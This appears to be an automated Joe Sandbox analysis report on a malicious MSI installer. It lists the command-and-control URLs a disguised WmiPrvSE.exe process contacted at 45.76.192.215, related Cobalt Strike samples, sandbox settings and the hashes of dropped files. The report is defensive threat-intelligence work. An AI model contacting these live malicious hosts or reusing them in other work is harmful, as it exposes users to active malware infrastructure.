                https://45.76.192.215:59611/vFoJWmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/load.215:59611/GFxJ(WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/oadWmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1578339616.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1600170411.00000000058EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1532861117.000000000646C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1557726516.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1566977272.00000000062CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://45.76.192.215:59611/loadvWmiPrvSE.exe, 00000017.00000002.3871035138.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/load.215:59611/BFsJWmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/92.215:59611/WmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786728505.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.00000000008B8000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1586466556.0000000007003000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://45.76.192.215:59611/kXWmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/load.215:59611/loadGFxJ(WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://45.76.192.215:59611/kFTJWmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/load.215:59611/adMFvJ&WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/loadkYWmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733263656.00000000008B0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/5F.JWmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/loadgYWmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859777819.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901236743.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/loadCYWmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/load.215:59611/WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/sX(JWmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786728505.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.00000000008B8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.micropowershell.exe, 0000000B.00000002.1538195254.0000000007BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1516318919.0000000003628000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://45.76.192.215:59611/load.215:59611/oadWmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/MFvJ&WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/oad;F$JWmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/oad5F.JWmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.76.192.215:59611/loadcsWmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                45.76.192.215
                unknownUnited States
                20473AS-CHOOPAUStrue
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1487470
                Start date and time:2024-08-04 10:48:13 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 11m 15s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:31
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:1eSOBjseu2.msi
                renamed because original name is a hash value
                Original Sample Name:29dd2916c20e18b713a8ecb72d3df632961e818cf35484ec6bafedc2ff415680.msi
                Detection:MAL
                Classification:mal100.troj.evad.winMSI@37/69@0/1
                EGA Information:
                • Successful, ratio: 60%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 109
                • Number of non-executed functions: 186
                Cookbook Comments:
                • Found application associated with file extension: .msi
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 199.232.210.172, 204.79.197.203, 95.101.149.131, 88.221.110.91, 2.16.100.168, 2.19.126.137, 2.19.126.163
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, download.windowsupdate.com.edgesuite.net, www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, wu-b-net.trafficmanager.net, www.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 1148 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 8116 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                04:49:14API Interceptor208x Sleep call for process: powershell.exe modified
                04:49:20API Interceptor13775741x Sleep call for process: WmiPrvSE.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                45.76.192.215wj7vzBqUl9.exeGet hashmaliciousCobaltStrikeBrowse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  bg.microsoft.map.fastly.net3868LQ8lzf.exeGet hashmaliciousPureLog StealerBrowse
                  • 199.232.210.172
                  https://dvmtp.r.ag.d.sendibm3.com/mk/un/sh/1t6AVsdYhqSR1o1yYHZUELgBUnazHr/j54QtPSXoIeRGet hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  https://transportationzhxztpro.top/i/Get hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  https://loker-pt-freeport-indonesia-2024.digitall-co.web.id/Get hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  https://mail.valeshia.50-6-170-168.cprapid.com/Get hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  https://freeusps.com/collections/all-usps-stamp/products/u-s-flag-2022-9683?data_from=collection_detailGet hashmaliciousUnknownBrowse
                  • 199.232.210.172
                  https://freeusps.com/collections/2019/products/2017-disney-villains-100pcs?data_from=collection_detailGet hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  http://v1.bcit.pro/2131005010/Instagram.com.htmlGet hashmaliciousUnknownBrowse
                  • 199.232.210.172
                  https://internal-checker.com/personal.htmlGet hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  http://internal-checker.com/Get hashmaliciousUnknownBrowse
                  • 199.232.210.172
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AS-CHOOPAUSwj7vzBqUl9.exeGet hashmaliciousCobaltStrikeBrowse
                  • 45.76.192.215
                  HhaL0xmHfu.elfGet hashmaliciousMiraiBrowse
                  • 149.28.201.17
                  https://myallsouth.com/privacy-policy/Get hashmaliciousUnknownBrowse
                  • 207.148.0.16
                  yycwWrUXJN.elfGet hashmaliciousMiraiBrowse
                  • 44.40.175.55
                  PBEZlc6yX7.elfGet hashmaliciousMiraiBrowse
                  • 155.138.237.181
                  E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                  • 45.76.89.70
                  Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                  • 45.76.89.70
                  DNQuHRCp7X.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                  • 45.76.89.70
                  sora.mips.elfGet hashmaliciousMiraiBrowse
                  • 45.32.242.13
                  https://neoventive.com.tr/Doc/Get hashmaliciousUnknownBrowse
                  • 209.250.225.94
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\Public\WmiPrvSE.exewj7vzBqUl9.exeGet hashmaliciousCobaltStrikeBrowse
                    C:\Windows\Installer\MSI3FB2.tmp2024.0198840 298135.msiGet hashmaliciousUnknownBrowse
                      hForm.0198840 739798.msiGet hashmaliciousUnknownBrowse
                        ust_019821730-0576383.msiGet hashmaliciousUnknownBrowse
                          Br_i421i2-2481-125_754864.msiGet hashmaliciousUnknownBrowse
                            RAS_OL321231.msiGet hashmaliciousUnknownBrowse
                              file.msiGet hashmaliciousUnknownBrowse
                                file.msiGet hashmaliciousUnknownBrowse
                                  file.msiGet hashmaliciousUnknownBrowse
                                    NFE_098734_br.msiGet hashmaliciousUnknownBrowse
                                      HCUVHNQCS1.exeGet hashmaliciousUnknownBrowse
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):8428
                                        Entropy (8bit):5.542871958785147
                                        Encrypted:false
                                        SSDEEP:96:rrpm7wjevyXsi2BUCTCsThqZBUCTC6j83Z7nThqRHAPQ5CXXe5MXWVk1llWCMpl5:rrpmGeqX26COIm6COFTnov2DPMpL
                                        MD5:455E6ECA24270DB2D82950BDD521A5E9
                                        SHA1:1C913A96BF6AC067A79D5FA2999931DE3754F9E3
                                        SHA-256:BEC37E6DCBB93BBFF228226DA70801B16040D1E6EC6835354272F4E756CAB29A
                                        SHA-512:CF24599BEE7CC4BB35F032E5BC4240DD74F618BF05D8A95191416FD24C6B67E5397EAFB2D12930B3ACD1C16C4C9ABCFEA50B63E375C493D3621500B83E814456
                                        Malicious:false
                                        Preview:...@IXOS.@.....@&&.Y.@.....@.....@.....@.....@.....@......&.{88D74BC3-DFDB-412A-9165-9910293F91BC}..WmiPrvSE..1eSOBjseu2.msi.@.....@.....@.....@........&.{9AD54326-34E0-4D44-AFB7-7A7E831CAF55}.....@.....@.....@.....@.......@.....@.....@.......@......WmiPrvSE......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4CDF882A-AA01-456F-A2EA-94ABE42E2C47}&.{88D74BC3-DFDB-412A-9165-9910293F91BC}.@......&.{B4630925-A1BD-4A8D-9FE5-108126E4BB94}&.{88D74BC3-DFDB-412A-9165-9910293F91BC}.@......&.{9C0BC1EA-30AD-4B69-AFF6-894FE3DFA0B2}&.{88D74BC3-DFDB-412A-9165-9910293F91BC}.@........CreateFolders..Creating folders..Folder: [1]#.).C:\Program Files (x86)\WmiPrvSE\WmiPrvSE\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....X.Software\Caphyon\Advanced Installer\Prereqs\{88D74BC3-DFDB-412A-9165-9910293F91BC}\1.0.0...@....(.&...Desktop..1$..@......Software\WmiPrvS
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):387
                                        Entropy (8bit):5.0003394709815705
                                        Encrypted:false
                                        SSDEEP:6:Ea3LMne/YeduuwVMWNKQ2lE4Qsgmll/JwsuRkYRsj9Yq:EgyOBdudpNK9JQsj//Sft2/
                                        MD5:28C9D7F0D29F1CCA264F4F6B87862C21
                                        SHA1:D5C36F1EBEE16D461B69A2C299905DB0A62C89FE
                                        SHA-256:234E147B0C9F15E6B3A5E499E1821BFDE5E964DDE1A5EF0EE7CB0CB5212D24BA
                                        SHA-512:5684DA03744E096D5445F916CD255FF38DCD5ED4CBD9450C3E64D71DF005E491E98621CB29A430F27035F4BBD472C00ADD15A516AD658D299938FBB670889757
                                        Malicious:false
                                        Preview:...@IXOS.@.....@&&.Y.@.....@.....@.....@.....@.....@......&.{88D74BC3-DFDB-412A-9165-9910293F91BC}..WmiPrvSE..1eSOBjseu2.msi.@.....@.....@.....@........&.{9AD54326-34E0-4D44-AFB7-7A7E831CAF55}.....@.....@.....@.....@.......@.....@.....@.......@......WmiPrvSE......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....AI_LaunchChainer...@.....@.....@....
                                        Process:C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe
                                        File Type:PEM certificate
                                        Category:dropped
                                        Size (bytes):452024
                                        Entropy (8bit):5.964354272730181
                                        Encrypted:false
                                        SSDEEP:6144:Tjf0HLIBA25QRA+EzBpajKm/1J04Ug4ZHnb1ByEJ1EoWt:Tjf0rOAkXB8um/1G3gOHb1BySEoI
                                        MD5:B183EB98A872FBA5091122FF3F84B025
                                        SHA1:6E3EF383306687A08B81A6528DB63E206DF6B7C2
                                        SHA-256:628DF0A54E9A5A18BBABDB2F33333E5F12898028132757A24A1EE5C6FD63FF67
                                        SHA-512:C19A32B01F9684627A9EDE7E1DB2AAD1B40D5B80CC74BD8CD47BB4BC4F46C8AC98676ADBD3C8E2EA140B504AE257DB893DCB2EA498F14B90D051C8BF9D5B05ED
                                        Malicious:false
